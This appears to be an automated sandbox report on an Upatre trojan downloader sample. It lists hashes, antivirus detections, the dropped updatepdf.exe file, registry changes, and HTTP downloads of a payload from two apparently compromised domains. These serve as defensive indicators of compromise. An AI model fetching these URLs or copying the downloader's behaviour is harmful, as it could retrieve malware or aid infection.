Analysis Date: 2014-07-29 21:42:56
MD5: b984b5cf9c48244f5233eb01d7ee0b5d
SHA1: 89e8901d6586b5c0848749f380e16be302ce1941

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9852e04deb66dac0e4f76e488e785f82 sha1: 476911dd079cfdb70b5f22238f0bce0c42f32154 size: 3584
Section.rdata md5: e71325114c389c1e3938be588ceb3945 sha1: e718a567455265820bd24f201291f867c90f3304 size: 1024
Section.data md5: 11398cb3a3813276464ee7f3ebd76ed6 sha1: d7ef037ab9fa8ebf37c8486c77c179f831512c46 size: 1536
Section.rsrc md5: 7f446a959c3172d859200716a1cca74f sha1: 031776346ffc65bbd27ca073618292c04fd6e413 size: 10752
Timestamp: 2013-04-07 22:10:41
PEhash: 9c163515c83777f0d8b89d34ea810d7ea80f9f4f
IMPhash: 5bdbfadc30986867f14f8da3f77b42ab
AV 360 Safe: Trojan.Downloader.JQKN
AV Ad-Aware: Trojan.Downloader.JQKN
AV Alwil (avast): Zbot-TCT [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Downloader.XIVZ-2942
AV Avira (antivir): TR/Yarwi.B.185.2
AV CA (E-Trust Ino): Win32/Upatre.KUFMcJD
AV CAT (quickheal): TrojanDownloader.Upatre.A4
AV ClamAV: Win.Trojan.Downloader-61193
AV Dr. Web: Trojan.DownLoad3.28161
AV Emsisoft: no_virus
AV Eset (nod32): Win32/TrojanDownloader.Waski.A
AV Fortinet: W32/Bublik.BZH!tr
AV Frisk (f-prot): W32/Downldr2.IZNH (exact)
AV F-Secure: Trojan.Downloader.JQKN
AV Grisoft (avg): Generic_s.CQT
AV Ikarus: Trojan.Agent
AV K7: Trojan-Downloader ( 0048f6391 )
AV Kaspersky: Trojan-Spy.Win32.Zbot.rmwh
AV MalwareBytes: Trojan.Downloader.Upatre
AV Mcafee: Downloader-FSH!B984B5CF9C48
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre.AA
AV MicroWorld (escan): Trojan.Downloader.JQKN
AV Norman: winpe/Upatre.BL
AV Sophos: Troj/DwnLdr-LJA
AV Symantec: Downloader.Upatre
AV Trend Micro: TROJ_UPATRE.KYIY
AV VirusBlokAda (vba32): TrojanSpy.Zbot

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: annamumfordphoto.com
Winsock DNS: gothambeerfest.co.uk

Network Details:

DNS: gothambeerfest.co.uk (Type: A) ➝ 87.117.220.217
DNS: annamumfordphoto.com (Type: A) ➝ 82.98.86.175
HTTP GET: http://gothambeerfest.co.uk/wp-content/themes/iscout4wordpress/images/al1402.pdd
User-Agent: Updates downloader
HTTP GET: http://annamumfordphoto.com/images/al1402.pdd
User-Agent: Updates downloader
HTTP GET: http://gothambeerfest.co.uk/wp-content/themes/iscout4wordpress/images/al1402.pdd
User-Agent: Updates downloader
HTTP GET: http://annamumfordphoto.com/images/al1402.pdd
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 87.117.220.217:80
Flows TCP: 192.168.1.1:1032 ➝ 82.98.86.175:80
Flows TCP: 192.168.1.1:1033 ➝ 87.117.220.217:80
Flows TCP: 192.168.1.1:1034 ➝ 82.98.86.175:80

Raw Pcap


Strings
About
C:\Users\lbohac\Desktop\fax.pdf.exe
Exit
FILE
Help
MS Sans Serif
Push to exit
Save
Wolmo
ClientToScreen
CloseHandle
COMCTL32.dll
CreateFileW
@.data
DialogBoxIndirectParamW
DragFinish
DragQueryFileA
DragQueryPoint
EndDialog
ExitProcess
GDI32.dll
GetDlgItem
GetFileSize
InitCommonControlsEx
KERNEL32.dll
LineTo
MessageBoxA
MessageBoxW
MoveToEx
`.rdata
SendMessageW
SHELL32.dll
TextOutA
!This program cannot be run in DOS mode.
USER32.dll
WINTRUST.dll
WinVerifyTrust
wsprintfW